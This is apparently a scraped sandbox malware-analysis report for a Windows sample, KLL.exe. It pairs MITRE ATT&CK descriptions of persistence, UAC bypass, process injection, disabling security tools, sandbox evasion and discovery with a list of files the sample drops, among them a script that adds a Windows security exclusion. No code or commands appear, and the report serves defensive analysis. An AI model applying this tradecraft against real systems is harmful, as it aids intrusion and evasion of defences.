Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KLL.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1

C:\Program Files (x86)\letsvpn\LetsPRO.exe

C:\Program Files (x86)\letsvpn\Update.exe

C:\Program Files (x86)\letsvpn\app-3.7.0\CommunityToolkit.Mvvm.dll

C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.MsDelta.dll

C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.PatchApi.dll

C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.dll

C:\Program Files (x86)\letsvpn\app-3.7.0\FontAwesome.WPF.dll

C:\Program Files (x86)\letsvpn\app-3.7.0\Hardcodet.Wpf.TaskbarNotification.dll

C:\Program Files (x86)\letsvpn\app-3.7.0\ICSharpCode.AvalonEdit.dll

C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe

C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe.config

Windows Analysis Report
KLL.exe

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre